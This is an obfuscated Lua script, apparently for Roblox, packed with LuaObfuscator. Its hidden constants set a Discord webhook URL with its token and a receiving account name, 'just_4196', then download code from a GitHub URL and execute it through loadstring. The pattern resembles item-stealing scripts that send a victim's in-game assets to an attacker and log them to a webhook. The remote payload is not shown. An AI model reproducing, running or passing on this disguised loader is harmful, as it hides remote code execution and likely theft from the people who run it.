--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v86=v5(v80,v19);v19=nil;return v86;else return v80;end end end);local function v20(v31,v32,v33)if v33 then local v81=(v31/((5 -3)^(v32-(2 -1))))%(((1 + 2) -1)^(((v33-(2 -1)) -(v32-1)) + 1)) ;return v81-(v81%(620 -(555 + 64))) ;else local v82=((147 + 786) -(857 + 74))^(v32-1) ;return (((v31%(v82 + v82))>=v82) and (569 -(367 + (1078 -(282 + 595))))) or ((2564 -(1523 + 114)) -(214 + 713)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v36 * (364 -108)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (1068 -(68 + (1114 -(32 + 85)))) );v18=v18 + (1274 -(226 + 1024 + 20)) ;return (v40 * (3720433 + 13056783)) + (v39 * (285370 -219834)) + (v38 * 256) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=958 -(892 + 65) ;local v44=(v20(v42,2 -1 ,20) * ((4 -2)^(58 -26))) + v41 ;local v45=v20(v42,38 -17 ,(833 -452) -(87 + 263) );local v46=((v20(v42,212 -(67 + 113) )==1) and  -(1 + 0)) or 1 ;if (v45==(0 -0)) then if (v44==0) then return v46 * 0 ;else local v87=0 + 0 ;while true do if (v87==((0 + 0) -0)) then v45=(1692 -739) -(802 + 150) ;v43=0 -0 ;break;end end end elseif (v45==(3712 -1665)) then return ((v44==(0 + 0)) and (v46 * ((998 -(915 + 82))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(596 + 427) ) * (v43 + (v44/((2 -0)^((1230 + 9) -(1069 + 118))))) ;end local function v25(v47)local v48;if  not v47 then local v83=791 -(368 + 423) ;while true do if (v83==0) then v47=v23();if (v47==((442 -(416 + 26)) -0)) then return "";end break;end end end v48=v3(v16,v18,(v18 + v47) -(19 -(10 + 8)) );v18=v18 + v47 ;local v49={};for v64=3 -2 , #v48 do v49[v64]=v2(v1(v3(v48,v64,v64)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0 + 0 ;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v50~=(11 -8)) then else v57=nil;while true do local v88=0 -0 ;while true do if (v88==(1 -0)) then if (v51~=(0 + 0)) then else local v95=0 -0 ;while true do if (v95~=1) then else v54={};v51=1 + 0 ;break;end if (v95==0) then v52={};v53={};v95=1475 -(1329 + 145) ;end end end if (v51~=1) then else local v96=0;local v97;while true do if (v96==0) then v97=971 -(140 + 831) ;while true do if (v97~=(1851 -(1409 + 441))) then else v57={};v51=720 -(15 + 703) ;break;end if (v97~=0) then else local v127=0 + 0 ;while true do if (v127==(439 -(262 + 176))) then v97=1722 -(345 + 1376) ;break;end if (v127~=(688 -(198 + 490))) then else v55={v52,v53,nil,v54};v56=v23();v127=1 -0 ;end end end end break;end end end break;end if (v88~=0) then else if (v51~=3) then else for v99=1263 -(1091 + 171) ,v23() do v53[v99-1 ]=v28();end return v55;end if (v51==(1 + 1)) then local v98=0;while true do if (0==v98) then for v102=3 -2 ,v56 do local v103=0 -0 ;local v104;local v105;local v106;while true do if (v103~=(375 -(123 + 251))) then else v106=nil;while true do if (v104==0) then v105=v21();v106=nil;v104=4 -3 ;end if (v104==1) then if (v105==1) then v106=v21()~=(698 -(208 + 490)) ;elseif (v105==(1 + 1)) then v106=v24();elseif (v105==(2 + 1)) then v106=v25();end v57[v102]=v106;break;end end break;end if (0==v103) then v104=0;v105=nil;v103=1;end end end v55[839 -(660 + 176) ]=v21();v98=1 + 0 ;end if (v98~=(203 -(14 + 188))) then else for v107=676 -(534 + 141) ,v23() do local v108=0 + 0 ;local v109;local v110;local v111;while true do if (v108==(0 + 0)) then v109=0 + 0 ;v110=nil;v108=1 -0 ;end if ((1 -0)==v108) then v111=nil;while true do if (v109==0) then local v160=0 -0 ;while true do if (v160~=1) then else v109=1 + 0 ;break;end if (v160~=(0 + 0)) then else v110=0;v111=nil;v160=1;end end end if (v109~=(397 -(115 + 281))) then else while true do if (v110==0) then v111=v21();if (v20(v111,1,2 -1 )~=(0 + 0)) then else local v167=0;local v168;local v169;local v170;local v171;while true do if (0==v167) then v168=0;v169=nil;v167=1;end if (v167==(4 -2)) then while true do if (v168~=0) then else local v173=0 -0 ;while true do if ((868 -(550 + 317))==v173) then v168=1 -0 ;break;end if (v173==(0 -0)) then v169=v20(v111,5 -3 ,3);v170=v20(v111,289 -(134 + 151) ,6);v173=1666 -(970 + 695) ;end end end if (v168==(5 -2)) then if (v20(v170,3,1993 -(582 + 1408) )~=1) then else v171[4]=v57[v171[13 -9 ]];end v52[v107]=v171;break;end if (v168==(2 -0)) then if (v20(v170,1,1)==(3 -2)) then v171[2]=v57[v171[1826 -(1195 + 629) ]];end if (v20(v170,2 -0 ,2)==(242 -(187 + 54))) then v171[3]=v57[v171[783 -(162 + 618) ]];end v168=3;end if (v168==1) then v171={v22(),v22(),nil,nil};if (v169==(0 + 0)) then local v181=0 -0 ;while true do if (v181==0) then v171[4 -1 ]=v22();v171[1 + 3 ]=v22();break;end end elseif (v169==(1637 -(1373 + 263))) then v171[1003 -(451 + 549) ]=v23();elseif (v169==(1 + 1)) then v171[3]=v23() -((2 -0)^(26 -10)) ;elseif (v169==3) then local v186=1384 -(746 + 638) ;local v187;while true do if ((0 + 0)~=v186) then else v187=0 -0 ;while true do if (v187~=(341 -(218 + 123))) then else v171[1584 -(1535 + 46) ]=v23() -((2 + 0)^(3 + 13)) ;v171[564 -(306 + 254) ]=v22();break;end end break;end end end v168=2;end end break;end if (1==v167) then local v172=0 + 0 ;while true do if (v172==(0 -0)) then v170=nil;v171=nil;v172=1;end if ((1468 -(899 + 568))~=v172) then else v167=2;break;end end end end end break;end end break;end end break;end end end v51=2 + 1 ;break;end end end v88=1;end end end break;end if (v50==0) then v51=0 -0 ;v52=nil;v50=1;end if (v50~=(604 -(268 + 335))) then else v53=nil;v54=nil;v50=292 -(60 + 230) ;end if (v50~=(574 -(426 + 146))) then else v55=nil;v56=nil;v50=1 + 2 ;end end end local function v29(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v84=0,v74 do if (v84>=v68) then v72[v84-v68 ]=v73[v84 + 1 ];else v76[v84]=v73[v84 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v85=0;while true do if (v85==1) then if (v79<=10) then if (v79<=4) then if (v79<=1) then if (v79==0) then v70=v78[3];else v70=v78[3];end elseif (v79<=2) then local v114=v78[2];v76[v114]=v76[v114](v13(v76,v114 + 1 ,v71));elseif (v79==3) then local v128=0;local v129;while true do if (v128==0) then v129=v78[2];v76[v129]=v76[v129](v13(v76,v129 + 1 ,v71));break;end end else v76[v78[2]]=v78[3]~=0 ;end elseif (v79<=7) then if (v79<=5) then v76[v78[2]]=v78[3];elseif (v79==6) then v76[v78[2]]=v60[v78[3]];else v76[v78[2]][v78[3]]=v78[4];end elseif (v79<=8) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79>9) then local v136=0;local v137;local v138;local v139;local v140;while true do if (v136==2) then for v161=v137,v71 do v140=v140 + 1 ;v76[v161]=v138[v140];end break;end if (v136==0) then v137=v78[2];v138,v139=v69(v76[v137](v13(v76,v137 + 1 ,v78[3])));v136=1;end if (v136==1) then v71=(v139 + v137) -1 ;v140=0;v136=2;end end else local v141=v78[2];local v142=v76[v78[3]];v76[v141 + 1 ]=v142;v76[v141]=v142[v78[4]];end elseif (v79<=15) then if (v79<=12) then if (v79==11) then do return;end else v76[v78[2]]();end elseif (v79<=13) then v76[v78[2]]=v78[3];elseif (v79==14) then local v146=0;local v147;local v148;local v149;local v150;while true do if (0==v146) then v147=v78[2];v148,v149=v69(v76[v147](v13(v76,v147 + 1 ,v78[3])));v146=1;end if (v146==1) then v71=(v149 + v147) -1 ;v150=0;v146=2;end if (2==v146) then for v164=v147,v71 do v150=v150 + 1 ;v76[v164]=v148[v150];end break;end end elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79<=18) then if (v79<=16) then local v120=v78[2];local v121=v76[v78[3]];v76[v120 + 1 ]=v121;v76[v120]=v121[v78[4]];elseif (v79>17) then v76[v78[2]][v78[3]]=v78[4];else do return;end end elseif (v79<=19) then v76[v78[2]]=v60[v78[3]];elseif (v79>20) then v76[v78[2]]=v78[3]~=0 ;else v76[v78[2]]();end v70=v70 + 1 ;break;end if (v85==0) then v78=v66[v70];v79=v78[1];v85=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O323832303231303336323137313339322F396771795A686A356E7359772O734947505F316F57356233495A32502D395664524770454647574F6D4944304D6435386C46744D4A4B746D524B37414658547853666338030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503093O006A7573745F3431393603093O00557365724E616D653200173O00120D3O00013O00260F3O000E0001000200044O000E0001001213000100033O003007000100040005001213000100063O001213000200073O00201000020002000800120D000400094O0004000500014O000E000200054O000300013O00022O000C00010001000100044O0016000100260F3O00010001000100044O00010001001213000100033O0030070001000A000B001213000100033O0030070001000C000B00120D3O00023O00044O000100012O00113O00017O00",v9(),...);end
